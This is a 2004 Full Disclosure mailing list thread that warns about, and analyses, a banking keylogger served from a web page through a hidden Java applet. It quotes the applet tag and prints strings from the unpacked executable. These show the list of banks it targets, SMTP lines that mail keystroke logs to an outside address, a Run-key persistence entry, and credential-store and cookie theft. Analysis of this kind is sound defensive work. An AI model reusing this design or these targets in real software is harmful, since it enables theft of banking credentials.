Full Disclosure mailing list archives

RE: Re: http://federalpolice.com:article872@1075686747

From: "Aditya, ALD [Aditya Lalit Deshmukh]" <aditya.deshmukh () online gateway technolabs net>
Date: Mon, 16 Feb 2004 09:22:51 +0530

this is a keylogger that will mail out your intresting logs to some russian address!
so beware of this one,

but what i couldent understand is how is this file executed ? 

-aditya

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of
n.teusink () planet nl
Sent: Sunday, February 15, 2004 11:40 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re:
http://federalpolice.com:article872@1075686747


From the source of that page:

APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1

BlackBox.class is detected immediately by my virusscanner as 
ClassLoader/E, more 
info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm

The javautil.zip appears to be an exe file renamed to zip. The 
exe is compressed with 
FSG.

Interresting pieces of output from strings on the decompressed exe:


----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
      \kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan () mail ru>
RCPT TO:<pentasatan () mail ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END

I think you can draw your own conclusions about this file.

Niels

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 15)
- RE: Re: http://federalpolice.com:article872@1075686747 Aditya, ALD [Aditya Lalit Deshmukh] (Feb 16)
- <Possible follow-ups>
- RE: http://federalpolice.com:article872@1075686747 Remko Lodder (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 first last (Feb 15)
- RE:http://federalpolice.com:article872@1075686747 Tom Koehler (Feb 16)
- Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 16)
  - Re: http://federalpolice.com:article872@1075686747 madsaxon (Feb 16)
- RE: Re: http://federalpolice.com:article872@1075686747 Nick Jacobsen (Feb 16)